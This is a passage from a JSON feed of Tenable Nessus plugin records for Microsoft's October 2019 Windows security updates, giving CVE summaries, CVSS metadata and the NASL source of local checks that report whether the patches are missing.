(CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. 
An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function run by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. 
The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4517389.NASL", "href": "https://www.tenable.com/plugins/nessus/129716", "published": "2019-10-08T00:00:00", "title": "KB4517389: Windows 10 Version 1903 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129716);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1323\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1336\",\n \"CVE-2019-1337\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4517389\");\n script_xref(name:\"MSFT\", value:\"MS19-4517389\");\n\n script_name(english:\"KB4517389: Windows 10 Version 1903 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4517389.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. 
The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. 
An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. 
An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. 
(CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4517389/windows-10-update-kb4517389\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13a5b27c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4517389.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4517389');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4517389])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T09:20:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520009\nor 
cumulative update 4520002. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. 
An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. 
(CVE-2019-1342)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function run by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n do not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service improperly handles a\n Registry Restore Key function. 
An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520002.NASL", "href": "https://www.tenable.com/plugins/nessus/129720", "published": "2019-10-08T00:00:00", "title": "KB4520009: Windows Server 2008 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129720);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1338\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1362\",\n \"CVE-2019-1364\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520002\");\n script_xref(name:\"MSKB\", value:\"4520009\");\n script_xref(name:\"MSFT\", value:\"MS19-4520002\");\n script_xref(name:\"MSFT\", value:\"MS19-4520009\");\n\n script_name(english:\"KB4520009: Windows Server 2008 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520009\nor cumulative update 4520002. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. 
An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. 
(CVE-2019-1342)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. 
An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\");\n # https://support.microsoft.com/en-us/help/4520002/windows-server-2008-update-kb4520002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72b9f640\");\n # https://support.microsoft.com/en-us/help/4520009/windows-server-2008-update-kb4520009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e19f82ff\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4520009 or Cumulative Update KB4520002.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520009', '4520002');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520009, 4520002])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:59", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520008.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. 
(CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
